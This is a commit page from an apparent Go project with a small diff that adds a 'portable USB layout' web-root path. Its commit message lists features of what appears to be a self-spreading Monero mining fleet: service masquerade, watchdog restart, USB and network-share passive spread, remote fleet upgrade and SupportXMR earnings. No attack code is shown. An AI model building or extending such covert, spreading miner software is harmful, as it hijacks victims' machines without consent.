Add fleet resilience, passive spread, matrix rain UI, and live earnings.
Backup server URL failover, watchdog process restart, service masquerade, remote fleet upgrade, recon UI, SupportXMR earnings, USB/share passive spread, and sidebar matrix rain with live fleet telemetry.
This commit is contained in:
@@ -387,6 +387,7 @@ func findWebRoot() string {
|
||||
if exe, err := os.Executable(); err == nil {
|
||||
exeDir := filepath.Dir(exe)
|
||||
candidates = append(candidates,
|
||||
filepath.Join(exeDir, "webroot"), // portable USB layout
|
||||
filepath.Join(exeDir, "..", "webroot"),
|
||||
filepath.Join(exeDir, "..", "web", "dist"),
|
||||
filepath.Join(exeDir, "..", "..", "server", "webroot"),
|
||||
|
||||
Reference in New Issue
Block a user